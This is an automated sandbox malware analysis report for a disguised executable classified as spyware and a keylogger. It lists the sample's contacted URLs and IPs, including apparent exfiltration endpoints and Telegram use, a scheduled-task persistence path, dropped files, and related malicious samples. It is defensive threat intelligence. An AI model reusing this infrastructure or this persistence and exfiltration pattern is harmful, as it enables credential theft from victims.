https://www.ecosia.org/newtab/	GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3768802271.0000000003C43000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3768802271.0000000003F30000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.000000000409D000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://varders.kozow.com:8081	GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 00000001.00000002.1361445588.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3760065848.0000000000434000.00000040.00000400.00020000.00000000.sdmp, SOFcFE.exe, 00000010.00000002.1452643874.0000000004431000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002D91000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://aborters.duckdns.org:8081	GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 00000001.00000002.1361445588.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3760065848.0000000000434000.00000040.00000400.00020000.00000000.sdmp, SOFcFE.exe, 00000010.00000002.1452643874.0000000004431000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002D91000.00000004.00000800.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
https://ac.ecosia.org/autocomplete?q=	GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3768802271.0000000003C43000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3768802271.0000000003F30000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.000000000409D000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://51.38.247.67:8081/_send_.php?L	GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002E12000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002F7F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org/xml/8.46.123.33$	GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002D05000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002CDF000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002E4E000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002E76000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002E08000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://anotherarmy.dns.army:8081	GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 00000001.00000002.1361445588.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3760065848.0000000000434000.00000040.00000400.00020000.00000000.sdmp, SOFcFE.exe, 00000010.00000002.1452643874.0000000004431000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002D91000.00000004.00000800.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3768802271.0000000003C43000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3768802271.0000000003F30000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.000000000409D000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.org/q	GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 00000001.00000002.1361445588.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000010.00000002.1452643874.0000000004431000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3760059045.0000000000435000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://chrome.google.com/webstore?hl=enlB	GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002F1E000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://reallyfreegeoip.org	GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002C70000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002D05000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002CDF000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002E4E000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002E76000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002DDE000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 00000001.00000002.1360405295.0000000002EE2000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000010.00000002.1451353095.0000000002B12000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002D91000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3768802271.0000000003C43000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3768802271.0000000003F30000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.000000000409D000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://awaratrendz.com	GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002E24000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002E12000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002F7F000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 00000001.00000002.1361445588.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000010.00000002.1452643874.0000000004431000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3760059045.0000000000435000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org/xml/	GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 00000001.00000002.1361445588.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002C70000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000010.00000002.1452643874.0000000004431000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002DDE000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3760059045.0000000000435000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
132.226.8.169	unknown	United States	16989	UTMEMUS	false
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	true
119.18.54.39	awaratrendz.com	India	394695	PUBLIC-DOMAIN-REGISTRYUS	true
188.114.96.3	reallyfreegeoip.org	European Union	13335	CLOUDFLARENETUS	true
193.122.130.0	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1524790
Start date and time:	2024-10-03 09:15:21 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 57s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	25
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	GeriOdemeBildirimi942.rar.xlxs.pdf.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@19/15@5/5
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 100% Number of executed functions: 198 Number of non-executed functions: 54
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target GeriOdemeBildirimi942.rar.xlxs.pdf.exe, PID 7220 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
03:16:21	API Interceptor	6674404x Sleep call for process: GeriOdemeBildirimi942.rar.xlxs.pdf.exe modified
03:16:25	API Interceptor	58x Sleep call for process: powershell.exe modified
03:16:30	API Interceptor	4337383x Sleep call for process: SOFcFE.exe modified
09:16:27	Task Scheduler	Run new task: SOFcFE path: C:\Users\user\AppData\Roaming\SOFcFE.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
132.226.8.169	Athnaton_ANP00224_Specification.xls	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	SCANNED COPY.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	CANADAXORDER.xls	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	RFQ-00032035.PDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	AE1169-0106202.xls	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Rfq H2110-11#U3000Order_ROYPOWTECH %100% S51105P-E01 #Uff08#U6700#U65b0#Uff09.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	SWIFT_COPY_-024-172700818106527.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	3140, EUR.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	1727684587d91a3fc4a77823bfb5c4c41b9d6c0bff84ae126bd19290c7e03bed994fdb4477364.dat-decoded.exe	Get hash	malicious	CryptOne, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	SYSN ORDER.xls	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
149.154.167.220	08(2)_00.exe	Get hash	malicious	AgentTesla	Browse
	Hesaphareketi-01.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	hesaphareketi-01.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	T3xpD9ZaYu.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	SCANNED COPY.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	doc_20241002_383767466374663543.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	AvQTFKdsST.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	All#att098764576.exe	Get hash	malicious	Snake Keylogger	Browse
	hesaphareketi-01.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	zR0pDxPfkZ.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	Hesaphareketi-01.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	hesaphareketi-01.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	Athnaton_ANP00224_Specification.xls	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	dllhost.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	IEnetbookupdation.hta	Get hash	malicious	Cobalt Strike, Snake Keylogger	Browse	188.114.96.3
	SCANNED COPY.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	Price Request 02.10.24.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	doc_20241002_383767466374663543.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	All#att098764576.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	hesaphareketi-01.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
checkip.dyndns.com	Hesaphareketi-01.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	hesaphareketi-01.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	Athnaton_ANP00224_Specification.xls	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	dllhost.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	IEnetbookupdation.hta	Get hash	malicious	Cobalt Strike, Snake Keylogger	Browse	193.122.6.168
	SCANNED COPY.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	Price Request 02.10.24.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	doc_20241002_383767466374663543.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	All#att098764576.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
awaratrendz.com	Dekont.rar.xlxs.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	119.18.54.39
awaratrendz.com	Halkbank_Ekstre_22#U202693.25.09.24.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	119.18.54.39
api.telegram.org	08(2)_00.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	Hesaphareketi-01.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	hesaphareketi-01.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	T3xpD9ZaYu.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	149.154.167.220
	SCANNED COPY.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	doc_20241002_383767466374663543.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	AvQTFKdsST.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	149.154.167.220
	All#att098764576.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	hesaphareketi-01.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	zR0pDxPfkZ.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	08(2)_00.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	Hesaphareketi-01.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	hesaphareketi-01.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	T3xpD9ZaYu.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	149.154.167.220
	tcU5sAPsAc.exe	Get hash	malicious	RedLine	Browse	149.154.167.99
	SCANNED COPY.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	doc_20241002_383767466374663543.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	AvQTFKdsST.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	149.154.167.220
	All#att098764576.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	hesaphareketi-01.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
UTMEMUS	Hesaphareketi-01.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	Athnaton_ANP00224_Specification.xls	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	dllhost.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	SCANNED COPY.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	doc_20241002_383767466374663543.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	zR0pDxPfkZ.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	#U304a#U898b#U7a4d#U308a#U4f9d#U983c.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	FACTURAS DE PAGOS.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	hesaphareketi-01.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	CANADAXORDER.xls	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
PUBLIC-DOMAIN-REGISTRYUS	PO23100070.exe	Get hash	malicious	AgentTesla	Browse	199.79.62.115
	grace.exe	Get hash	malicious	AgentTesla	Browse	208.91.198.176
	Purchase Order 007823-PO# 005307.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	208.91.199.223
	http://jeevankiranfoundationcenter.co.in/css/rrp.htm	Get hash	malicious	Kutaki	Browse	103.21.58.228
	RTGS-WB-ABS-240730-NEW.lnk	Get hash	malicious	AgentTesla	Browse	208.91.198.176
	Dekont.rar.xlxs.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	119.18.54.39
	http://labanquepostale.jupiter-analytics.com/thierry--_--.barbier/brigitte.--_--boissel@/francoise--_--.mariani@/salvatore--_--.fazzalari	Get hash	malicious	Unknown	Browse	162.222.225.80
	https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp/p%C2%ADep%C2%ADe%C2%ADm%C2%ADu%C2%ADj%C2%ADi%C2%ADc%C2%ADa%C2%AD.%C2%ADc%C2%ADom/hj	Get hash	malicious	Unknown	Browse	162.215.254.118
	http://labanquepostale.jupiter-analytics.com/thierry--_--.barbier/brigitte.--_--boissel@/francoise--_--.mariani@/salvatore--_--.fazzalari/	Get hash	malicious	Unknown	Browse	162.222.225.80
	SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	208.91.199.225

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	Hesaphareketi-01.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	hesaphareketi-01.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	dllhost.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	IEnetbookupdation.hta	Get hash	malicious	Cobalt Strike, Snake Keylogger	Browse	188.114.96.3
	Price Request 02.10.24.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	doc_20241002_383767466374663543.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	All#att098764576.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	hesaphareketi-01.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	zR0pDxPfkZ.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	WaUjTT0Wa1.exe	Get hash	malicious	VIP Keylogger	Browse	188.114.96.3
3b5074b1b5d032e5620f69f9f700ff0e	Comprobante.lnk.lnk	Get hash	malicious	Lokibot	Browse	149.154.167.220
	Comprobante.lnk.lnk	Get hash	malicious	Lokibot	Browse	149.154.167.220
	08(2)_00.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	Hesaphareketi-01.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	hesaphareketi-01.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	sostener.vbs	Get hash	malicious	Njrat	Browse	149.154.167.220
	sostener.vbs	Get hash	malicious	XWorm	Browse	149.154.167.220
	file.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	file.exe	Get hash	malicious	Unknown	Browse	149.154.167.220

Process:	C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SOFcFE.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\SOFcFE.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.380805901110357
Encrypted:	false
SSDEEP:	48:lylWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//ZPUyuVws:lGLHyIFKL3IZ2KRH9OugbVws
MD5:	18E30393FF7938228743359A706F90CE
SHA1:	D042841E7A99578FB7DF31A21111A90F31287D37
SHA-256:	818419579AF78103C20691E18138F0AD1154BF8356BFABFE5F43C4BADC66C367
SHA-512:	6BFEB58A5CD30CC27A410B292878AF214F711B21141DCCB5225FACC2B0269FFA17701F8878F933132545207FAAD99FB4ED7EC41298C20D474516430528B72B5F
Malicious:	false
Preview:	@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0kwp5mcr.1ew.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
